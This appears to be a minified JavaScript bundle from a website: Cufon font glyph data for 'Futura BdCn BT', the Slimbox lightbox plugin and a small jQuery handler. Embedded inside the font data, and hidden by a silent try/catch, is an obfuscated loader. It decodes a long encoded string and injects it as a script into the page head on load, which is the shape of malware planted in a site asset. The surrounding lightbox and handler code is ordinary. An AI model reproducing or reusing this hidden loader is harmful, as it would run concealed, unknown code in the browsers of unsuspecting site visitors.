-94r0,94r-47,0r0,-272r47,0r0,170","w":150,"k":{"e":6,"-":8}},{"d":"54,-87v0,27,6,49,26,49v37,0,37,-97,0,-97v-20,0,-26,22,-26,48xm80,-176v46,1,72,40,72,90v0,50,-25,89,-72,89v-47,-1,-72,-39,-72,-89v0,-50,25,-90,72,-90xm30,-261r43,0r33,65r-23,0","w":159},{"d":"101,-130v-59,-6,-29,82,-36,130r-47,0r0,-172r44,0r0,30v7,-19,17,-33,39,-34r0,46","w":103,"k":{".":36,"-":6,",":36}},{"d":"88,70r-82,0r0,-37r34,0r0,-262r-34,0r0,-36r82,0r0,335","w":99},{"d":"40,-197v0,18,5,33,20,34v28,0,27,-69,0,-68v-15,1,-20,16,-20,34xm60,-259v33,0,54,26,54,62v0,36,-20,63,-54,63v-34,0,-54,-27,-54,-63v0,-36,21,-62,54,-62","w":119},{"d":"130,-72v6,63,-68,94,-118,63r0,-53v16,19,66,28,66,-9v-11,-42,-70,-58,-70,-115v0,-61,64,-94,111,-61r0,45v-21,-14,-59,-18,-59,14v0,49,78,56,70,116","w":138,"k":{";":-7,":":-7,".":6,"-":-11,",":6}},{"d":"40,-261r43,0r33,65r-23,0","w":180},{"d":"77,-134v29,-1,28,-80,0,-81v-27,1,-26,80,0,81xm80,-260v47,0,68,39,68,90v0,43,-38,126,-58,170r-50,0r53,-104v-40,34,-84,-5,-84,-63v0,-55,20,-93,71,-93"},{"d":"79,-213v-34,0,-21,118,-16,152v2,12,8,18,16,18v34,0,20,-120,16,-153v-2,-12,-8,-17,-16,-17xm79,-260v56,0,70,62,70,132v0,71,-15,131,-70,131v-56,0,-70,-61,-70,-131v0,-71,13,-132,70,-132"},{"d":"24,69r21,-69r-45,-172r47,0v6,36,18,68,20,108v5,-38,13,-73,21,-108r47,0r-65,241r-46,0xm38,-207v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm96,-207v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":133},{"d":"0,55r180,0r0,30r-180,0r0,-30","w":180},{"d":"79,-260r31,0r-79,293r-31,0","w":110},{"d":"45,-152r210,0r0,89r-29,0r0,-59r-181,0r0,-30","w":299},{"d":"61,-98v0,16,5,28,19,28v14,0,18,-13,18,-28v0,-15,-4,-28,-18,-28v-14,0,-19,13,-19,28xm82,-260v40,2,59,25,58,67v-13,-1,-31,2,-42,-1v5,-31,-33,-37,-35,-10v12,40,92,46,85,109v-3,28,-15,49,-37,57v51,22,32,110,-31,110v-40,0,-58,-27,-58,-69r41,0v-7,33,34,42,34,10v0,-44,-92,-50,-87,-109v2,-30,17,-50,40,-59v-46,-25,-31,-109,32,-105"},{"d":"79,-39v29,-3,30,-96,-1,-97v-30,3,-27,95,1,97xm62,-174v19,1,29,11,37,26r0,-124r46,0r0,272r-46,0r0,-25v-8,17,-18,29,-39,29v-68,0,-68,-178,2,-178","w":163},{"d":"68,3r127,-263r29,0r-127,263r-29,0xm228,-119v-17,4,-15,19,-15,46v0,27,-2,40,15,44v25,-2,23,-88,0,-90xm228,-151v38,0,51,33,51,77v0,44,-13,77,-51,77v-37,0,-51,-33,-51,-77v0,-44,13,-77,51,-77xm64,-228v-18,3,-15,19,-15,45v0,26,-2,41,15,44v17,-3,15,-18,15,-44v0,-27,3,-41,-15,-45xm64,-260v38,0,51,34,51,78v0,44,-13,77,-51,77v-38,0,-51,-33,-51,-77v0,-44,13,-78,51,-78","w":294},{"d":"109,-174v33,0,36,18,36,56r0,118r-48,0r0,-104v-1,-17,0,-26,-15,-26v-15,1,-17,11,-17,28r0,102r-48,0r0,-172r44,0r0,26v10,-17,24,-28,48,-28","w":160},{"d":"33,-196r29,-65r35,0r30,65r-22,0r-25,-38r-26,38r-21,0xm79,-38v14,0,17,-8,17,-24r0,-110r47,0v-5,76,23,184,-63,175v-87,9,-58,-98,-64,-175r47,0r0,110v0,17,1,24,16,24"},{"d":"161,-257r38,0r87,99r-36,0r-70,-70r-70,70r-37,0","w":360},{"d":"79,-40v21,0,20,-23,21,-49v1,-25,-2,-46,-22,-46v-30,0,-28,95,1,95xm62,-174v21,0,28,12,38,28r0,-26r45,0r0,172r-45,0r0,-25v-8,15,-19,28,-38,28v-39,0,-51,-41,-51,-89v0,-47,12,-88,51,-88","w":163},{"d":"106,0v-10,-30,-24,-56,-30,-90v-7,32,-17,61,-27,90r-58,0r59,-130r-54,-127r54,0v9,29,21,53,27,85v7,-30,17,-57,27,-85r53,0r-54,127r58,130r-55,0","w":151,"k":{"\u0152":6,"\u00d8":6,"O":6,"C":6,";":6,":":6,".":-7,",":-7}},{"d":"40,-159v17,0,30,13,30,31v0,18,-13,31,-30,31v-17,0,-31,-13,-31,-31v0,-17,14,-31,31,-31","w":79},{"d":"13,-58r0,-56r91,0r0,56r-91,0","w":117,"k":{"\u0111":-7,"\u0153":-7,"\u0152":-7,"\u00f8":-7,"\u00d8":-7,"\u00c6":-10,"x":6,"s":-13,"q":-7,"o":-7,"g":-7,"e":-7,"d":-7,"c":-7,"Y":15,"W":8,"V":16,"T":20,"S":-7,"Q":-7,"O":-7,"J":-7,"G":-7,"C":-7}},{"d":"87,-239v-11,0,-18,7,-18,18v-1,10,9,17,18,17v9,1,18,-8,17,-17v0,-9,-7,-19,-17,-18xm87,-182v-21,0,-40,-18,-40,-39v-1,-21,19,-41,40,-40v21,0,39,20,39,40v0,20,-19,39,-39,39xm62,-174v20,0,29,13,38,28r0,-26r45,0r0,172r-45,0r0,-25v-9,15,-18,28,-38,28v-39,0,-51,-41,-51,-89v0,-47,12,-88,51,-88xm79,-40v31,-1,30,-94,-1,-95v-30,2,-28,93,1,95","w":163},{"d":"123,-172r20,124r20,-124r46,0r-45,172r-41,0r-19,-129v-4,45,-11,87,-18,129r-41,0r-46,-172r46,0r20,124r20,-124r38,0","w":208,"k":{".":26,",":26}},{"d":"63,0r0,-116r-59,0r0,-15r55,0r-12,-27r-43,0r0,-15r36,0r-36,-84r48,0r36,99v8,-38,24,-67,37,-99r45,0r-36,84r36,0r0,15r-43,0r-12,27r55,0r0,15r-59,0r0,116r-48,0","w":173},{"d":"22,0r0,-135r-18,0r0,-37r18,0r0,-50r48,0r0,50r19,0r0,37r-19,0r0,135r-48,0","w":92},{"d":"43,-192v-16,1,-28,-11,-28,-26v0,-16,12,-28,28,-28v16,0,27,12,27,28v0,15,-11,26,-27,26xm19,0r0,-172r47,0r0,172r-47,0","w":84},{"d":"79,-38v14,0,17,-8,17,-24r0,-110r47,0v-5,76,23,184,-63,175v-87,9,-58,-98,-64,-175r47,0r0,110v0,17,1,24,16,24xm30,-261r43,0r33,65r-23,0"},{"d":"149,-76v0,36,-20,64,-48,72r0,36r-15,0r0,-34v-6,0,-14,3,-19,1r0,33r-15,0r0,-35v-19,-3,-34,-12,-45,-27r20,-36v16,26,76,35,77,-7v-9,-45,-96,-50,-96,-114v0,-34,18,-56,44,-65r0,-33r15,0v1,9,-2,23,1,30v6,0,12,-2,18,0r0,-30r15,0r0,32v18,4,31,12,41,24r-24,35v-11,-10,-23,-19,-40,-19v-13,0,-26,9,-25,23v12,45,96,45,96,114"},{"d":"79,-38v14,0,17,-8,17,-24r0,-110r47,0v-5,76,23,184,-63,175v-87,9,-58,-98,-64,-175r47,0r0,110v0,17,1,24,16,24"},{"d":"59,-164v23,-1,23,-67,-1,-67v-21,1,-20,67,1,67xm8,-196v-9,-51,45,-84,67,-42r0,-19r34,0r0,121r-34,0r0,-18v-28,44,-72,8,-67,-42","w":122},{"d":"135,-215r30,0r0,93r90,0r0,29r-90,0r0,93r-30,0r0,-93r-90,0r0,-29r90,0r0,-93","w":299},{"d":"109,-174v33,1,36,17,36,56r0,118r-48,0r0,-104v-1,-17,0,-26,-15,-26v-15,1,-17,11,-17,28r0,102r-48,0r0,-272r48,0r0,120v11,-13,22,-22,44,-22","w":160},{"d":"72,-246v18,2,43,19,48,-6r16,0v-1,41,-31,49,-65,34v-8,0,-11,6,-13,14r-17,0v4,-23,11,-40,31,-42xm79,-40v21,0,20,-23,21,-49v1,-25,-2,-46,-22,-46v-30,0,-28,95,1,95xm62,-174v21,0,28,12,38,28r0,-26r45,0r0,172r-45,0r0,-25v-8,15,-19,28,-38,28v-39,0,-51,-41,-51,-89v0,-47,12,-88,51,-88","w":163},{"d":"79,-38v14,0,17,-8,17,-24r0,-110r47,0v-5,76,23,184,-63,175v-87,9,-58,-98,-64,-175r47,0r0,110v0,17,1,24,16,24xm130,-261r-53,65r-23,0r33,-65r43,0"},{"d":"22,0r0,-257r53,0r0,257r-53,0xm-1,-345r43,0r33,65r-23,0","w":97},{"d":"133,-128v0,-49,-14,-83,-61,-82r0,51r27,0r0,45r-27,0r0,67v47,0,61,-32,61,-81xm184,-128v0,99,-52,138,-162,128r0,-114r-22,0r0,-45r22,0r0,-98v106,-8,162,27,162,129","w":195,"k":{"Y":6,"W":6,"V":6,"A":6,";":-7,":":-7,".":15,",":15}},{"d":"22,0r0,-257r53,0r0,257r-53,0xm20,-291v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm78,-291v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":97},{"d":"109,-182v0,-26,-11,-37,-39,-35r0,72v27,2,40,-11,39,-37xm157,-184v0,36,-13,59,-41,67r50,117r-54,0r-42,-106r0,106r-50,0r0,-257v74,-2,137,-1,137,73","w":165,"k":{"\u0153":6,"\u00f8":6,"o":6,"e":6,".":-7,"-":10,",":-7}},{"d":"99,-42v29,0,29,-14,29,-49r0,-166r51,0r0,162v3,70,-18,98,-80,98v-65,0,-80,-33,-80,-106r0,-154r51,0r0,166v1,35,0,49,29,49xm70,-291v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm128,-291v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":197},{"d":"123,-204v-39,-28,-67,21,-62,75v2,18,3,36,6,52xm192,-128v0,89,-56,159,-132,119r-12,26r-19,-7r15,-33v-54,-58,-47,-245,58,-237v17,0,30,4,41,11r11,-25r17,9r-13,30v22,24,34,61,34,107xm79,-54v38,31,63,-19,63,-74v0,-21,-2,-38,-7,-54","w":203,"k":{"X":6,"T":6,";":-7,":":-7,".":15,"-":-7,",":15}},{"d":"73,-260v79,-8,93,132,26,145r0,34r-48,0r0,-60v26,-2,37,-12,37,-40v0,-18,-2,-31,-17,-32v-13,0,-17,12,-16,28r-47,0v-1,-48,20,-70,65,-75xm75,-59v17,0,31,14,31,31v0,17,-14,31,-31,31v-17,0,-31,-14,-31,-31v0,-17,14,-31,31,-31","w":155},{"d":"63,-128v0,45,4,82,39,82v33,0,39,-39,39,-82v0,-44,-6,-79,-39,-83v-34,3,-39,38,-39,83xm102,-260v64,0,90,62,90,135v0,68,-28,128,-90,128v-63,0,-90,-58,-90,-131v0,-72,26,-132,90,-132","w":203,"k":{"X":6,"T":6,";":-7,":":-7,".":15,"-":-7,",":15}},{"d":"24,69r21,-69r-45,-172r47,0v6,36,18,68,20,108v5,-38,13,-73,21,-108r47,0r-65,241r-46,0xm117,-261r-53,65r-23,0r33,-65r43,0","w":133},{"d":"253,-207r0,33r-164,67r164,67r0,32r-207,-85r0,-28","w":299},{"d":"20,0r0,-257r108,0r0,48r-58,0r0,52r53,0r0,47r-53,0r0,60r58,0r0,50r-108,0xm23,-345r43,0r33,65r-23,0","w":142},{"d":"44,0r0,-209r-39,0r0,-48r130,0r0,48r-39,0r0,209r-52,0","w":140,"k":{"\u0153":24,"\u0152":6,"\u00bb":20,"\u00ab":20,"\u00f8":24,"\u00e6":24,"\u00d8":6,"\u00c5":10,"y":29,"w":29,"u":29,"s":23,"r":28,"o":24,"i":6,"e":24,"c":24,"a":24,"O":6,"C":6,"A":10,";":29,":":29,".":46,"-":20,",":46}},{"d":"82,-202v-33,0,-48,-19,-48,-53r19,0v1,18,10,26,29,26v19,0,28,-8,29,-26r18,0v0,34,-14,53,-47,53xm62,-174v20,0,29,13,37,28r0,-26r46,0r0,159v-2,67,-8,93,-68,93v-40,0,-65,-21,-63,-63r40,0v0,16,7,25,23,25v31,0,20,-38,22,-65v-42,56,-88,6,-88,-63v0,-47,12,-88,51,-88xm79,-39v29,-3,30,-96,-1,-97v-30,3,-27,95,1,97","w":163},{"d":"85,-330v17,2,45,19,48,-7r16,0v0,42,-30,49,-65,35v-8,0,-11,6,-13,14r-16,0v4,-22,9,-41,30,-42xm63,-128v0,45,4,82,39,82v33,0,39,-39,39,-82v0,-44,-6,-79,-39,-83v-34,3,-39,38,-39,83xm102,-260v64,0,90,62,90,135v0,68,-28,128,-90,128v-63,0,-90,-58,-90,-131v0,-72,26,-132,90,-132","w":203},{"d":"0,-257r52,0r23,151v1,13,2,27,3,43r34,-194r43,0r33,194v1,-71,17,-129,25,-194r50,0r-51,257r-45,0v-10,-67,-28,-126,-33,-199v-7,71,-23,133,-36,199r-46,0","w":263,"k":{"\u0153":13,"\u00bb":6,"\u00ab":13,"\u00f8":13,"\u00e6":13,"\u00c5":6,"u":6,"r":10,"o":13,"e":13,"a":13,"A":6,";":8,":":8,".":24,"-":8,",":24}},{"d":"41,-196r30,-65r35,0r30,65r-22,0r-25,-38r-26,38r-22,0xm79,-40v21,0,20,-23,21,-49v1,-25,-2,-46,-22,-46v-30,0,-28,95,1,95xm62,-174v21,0,28,12,38,28r0,-26r45,0r0,172r-45,0r0,-25v-8,15,-19,28,-38,28v-39,0,-51,-41,-51,-89v0,-47,12,-88,51,-88","w":163},{"d":"45,0r0,-121r-60,-136r54,0r33,97v9,-34,20,-67,33,-97r50,0r-60,136r0,121r-50,0","w":140,"k":{"\u0153":16,"\u00bb":13,"\u00ab":26,"\u00f8":16,"\u00e6":16,"\u00c5":6,"u":11,"o":16,"e":16,"a":16,"A":6,";":38,":":38,".":48,"-":15,",":48}},{"d":"109,-181v0,-26,-12,-37,-39,-36r0,72v26,1,39,-11,39,-36xm157,-182v0,51,-34,81,-87,75r0,107r-50,0r0,-257v74,-4,137,2,137,75","w":163,"k":{"\u0153":13,"\u00ab":20,"\u00f8":13,"\u00e6":13,"\u00c5":13,"u":6,"s":6,"r":6,"o":13,"e":13,"a":13,"A":13,";":10,":":10,".":79,"-":21,",":79}},{"d":"70,-210r-12,210r-50,0r25,-257r66,0r21,181v6,-63,15,-123,26,-181r65,0r22,257r-52,0r-9,-208r-33,208r-37,0","w":240},{"d":"45,-86r210,0r0,29r-210,0r0,-29xm45,-158r210,0r0,29r-210,0r0,-29","w":299}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-812-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("0L:=w97zDg5i0e.-+9f$lLl5MC7=:95iMCv$DgXGebufLSlv0{)7Q46jF>x&gM`:Dw@+OtKq2Tn.9E_(aocWiHd^$]z=CAYJ}-I5;mjE:&Ic`]z2MSxd)Lld6&^=)bG.Qg+cMSxd)>n$MSxd)L:TMSxd)>`^j=^=)bG.:f^=)bG2:.^=)bG.7=^=)bud7=^=)bG97.^=)bGq`.^=)bGq).^=)bGq7SfjMSxd)LlzMSxd)L)^t.^=)bGT7f^=)bGT).^=)bG9:&^=)bG27EG@+>Xd`]+@+>Xd`Tf@+>X^)]G@+>Xd:>G@+>Xd`>K9t&^=)bGn7.^=)bG97&^=)bG.)>xKMSxd)Lu^MSxd)L)]:&^=)bG.`.^=)bGq:.^=)bG.`A(@+>Xd:TG@+>Xd:L:@+>Xd:L&JMSxd)L`zMSxd)Ll=:.^=)bG2`=^=)bu=)=^=)bG2Q&^=)bG.:xjIMSxd)L`YQf^=)bG.Qf^=)buz)2fCQ]fDO=^=)bG2:f^=)buC)f^=)bud`=^=)bGq:u&@+>X^7bf@+>X^7g:@+>Xd`>:@+>Xd:bf@+>X^)]f@+>X^7g&@+>Xd`Tv@+>X^7C&@+>X^)Lj@+>Xd`]&@+>Xd`9&@+>X^7>v@+>Xd`CuTMSxd)>XC0&^=)bGT`.^=)bGq)=^=)bGn)=^=)buAQf^=)bG2Qf^=)bG.`x(@+>Xd`]G@+>Xd`9v@+>Xd:b.@+>Xd`>.@+>Xd:bj@+>Xd:Lf@+>Xd:Lv@+>Xd:b+&MSxd)Lxzw=c;6z`iQT:X0nW@+>Xd`>G@+>Xd`C&@+>X^7CjlMSxd)L)CMSxd)Ljn&.^=)bu^)&^=)bGq:&^=)bG97]+@+>Xd:bv@MLlc>L7@+>Xd:T7]MSxd)L)JMSxd)L`^6.d2MSxd)L&90b7Ywx.@+>Xd`CjQMSxd)>f.v=^=)bG2)]v@+>Xd:>`zD9W@+>Xd:Tv$M&^=)bG2`&7KQ>G@+>Xd:9:tMe5@+>Xd`g7@+>Xd`>+nvgJ@+>Xd:9vO`&q@+>Xd`T@WMSxd)Lx=+=^=)bGq7Mj(MSxd)L`JvS&@+>Xd`guoDf^=)bG.)=^=)bG9`&^=)bGT`=^=)bGn)f^=)bGT:.v@+>Xd:L7@+>Xd:bKm>=^=)bG9:b^@+>Xd`]qxMSxd)>f9MSxd)L6=&=^=)bG.)..6>>z2{E7dwL.z0el20F^(4>Xc@b=2{EXcwb=d{9^.w9+zDe^E4gli:2JEwS.dDS)5OAz-Dg`_`2JHD]zHM2KmQE+A+=di0>I_4](d@95nwC5$MeJ]DFnn{Cni+L&]+eqcwC7q+L.Hw2J_wA7zw9fW:Fn(:95$0bW(4Ld-0$W(0g+w`=W(M&z5@fW(MMz(0enK")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":158,"face":{"font-family":"Futura BdCn BT","font-weight":400,"font-stretch":"condensed","units-per-em":"360","panose-1":"2 11 7 6 2 2 4 2 2 4","ascent":"288","descent":"-72","x-height":"3","bbox":"-16 -347 343 85","underline-thickness":"43.5938","underline-position":"-17.0508","unicode-range":"U+0020-U+0192"}}));(function(w){var E=w(window),u,g,F=-1,o,x,D,v,y,L,s,n=!window.XMLHttpRequest,e=window.opera&&(document.compatMode=="CSS1Compat")&&(w.browser.version>=9.3),m=document.documentElement,l={},t=new Image(),J=new Image(),H,a,h,q,I,d,G,c,A,K;w(function(){w("body").append(w([H=w('<div id="lbOverlay" />')[0],a=w('<div id="lbCenter" />')[0],G=w('<div id="lbBottomContainer" />')[0]]).css("display","none"));h=w('<div id="lbImage" />').appendTo(a).append(q=w('<div style="position: relative;" />').append([I=w('<a id="lbPrevLink" href="#" />').click(B)[0],d=w('<a id="lbNextLink" href="#" />').click(f)[0]])[0])[0];c=w('<div id="lbBottom" />').appendTo(G).append([w('<a id="lbCloseLink" href="#" />').add(H).click(C)[0],A=w('<div id="lbCaption" />')[0],K=w('<div id="lbNumber" />')[0],w('<div style="clear: both;" />')[0]])[0]});w.slimbox=function(O,N,M){u=w.extend({loop:false,overlayOpacity:0.8,overlayFadeDuration:400,resizeDuration:400,resizeEasing:"swing",initialWidth:250,initialHeight:250,imageFadeDuration:400,captionAnimationDuration:400,counterText:"Slika {x} od {y}",closeKeys:[27,88,67],previousKeys:[37,80],nextKeys:[39,78]},M);if(typeof O=="string"){O=[[O,N]];N=0}y=E.scrollTop()+((e?m.clientHeight:E.height())/2);L=u.initialWidth;s=u.initialHeight;w(a).css({top:Math.max(0,y-(s/2)),width:L,height:s,marginLeft:-L/2}).show();v=n||(H.currentStyle&&(H.currentStyle.position!="fixed"));if(v){H.style.position="absolute"}w(H).css("opacity",u.overlayOpacity).fadeIn(u.overlayFadeDuration);z();k(1);g=O;u.loop=u.loop&&(g.length>1);return b(N)};w.fn.slimbox=function(M,P,O){P=P||function(Q){return[Q.href,Q.title]};O=O||function(){return true};var N=this;return N.unbind("click").click(function(){var S=this,U=0,T,Q=0,R;T=w.grep(N,function(W,V){return O.call(S,W,V)});for(R=T.length;Q<R;++Q){if(T[Q]==S){U=Q}T[Q]=P(T[Q],Q)}return w.slimbox(T,U,M)})};function z(){var N=E.scrollLeft(),M=e?m.clientWidth:E.width();w([a,G]).css("left",N+(M/2));if(v){w(H).css({left:N,top:E.scrollTop(),width:M,height:E.height()})}}function k(M){w("object").add(n?"select":"embed").each(function(O,P){if(M){w.data(P,"slimbox",P.style.visibility)}P.style.visibility=M?"hidden":w.data(P,"slimbox")});var N=M?"bind":"unbind";E[N]("scroll resize",z);w(document)[N]("keydown",p)}function p(O){var N=O.keyCode,M=w.inArray;return(M(N,u.closeKeys)>=0)?C():(M(N,u.nextKeys)>=0)?f():(M(N,u.previousKeys)>=0)?B():false}function B(){return b(x)}function f(){return b(D)}function b(M){if(M>=0){F=M;o=g[F][0];x=(F||(u.loop?g.length:0))-1;D=((F+1)%g.length)||(u.loop?0:-1);r();a.className="lbLoading";l=new Image();l.onload=j;l.src=o}return false}function j(){a.className="";w(h).css({backgroundImage:"url("+o+")",visibility:"hidden",display:""});w(q).width(l.width);w([q,I,d]).height(l.height);w(A).html(g[F][1]||"");w(K).html((((g.length>1)&&u.counterText)||"").replace(/{x}/,F+1).replace(/{y}/,g.length));if(x>=0){t.src=g[x][0]}if(D>=0){J.src=g[D][0]}L=h.offsetWidth;s=h.offsetHeight;var M=Math.max(0,y-(s/2));if(a.offsetHeight!=s){w(a).animate({height:s,top:M},u.resizeDuration,u.resizeEasing)}if(a.offsetWidth!=L){w(a).animate({width:L,marginLeft:-L/2},u.resizeDuration,u.resizeEasing)}w(a).queue(function(){w(G).css({width:L,top:M+s,marginLeft:-L/2,visibility:"hidden",display:""});w(h).css({display:"none",visibility:"",opacity:""}).fadeIn(u.imageFadeDuration,i)})}function i(){if(x>=0){w(I).show()}if(D>=0){w(d).show()}w(c).css("marginTop",-c.offsetHeight).animate({marginTop:0},u.captionAnimationDuration);G.style.visibility=""}function r(){l.onload=null;l.src=t.src=J.src=o;w([a,h,c]).stop(true);w([I,d,h,G]).hide()}function C(){if(F>=0){r();F=x=D=-1;w(a).hide();w(H).stop().fadeOut(u.overlayFadeDuration,k)}return false}})(jQuery);$(document).ready(function(){Cufon.replace('h1'); Cufon.replace('#sidebar h2'); var pos = "info";var ta = "prodoor";$(".posta").attr("href","mailto:" + pos + "@" + ta + ".si").html(pos + "@" + ta + ".si");$("a[rel='external']").click( function() {  window.open( $(this).attr('href') );  return false;  });$("a.lightbox").slimbox();});
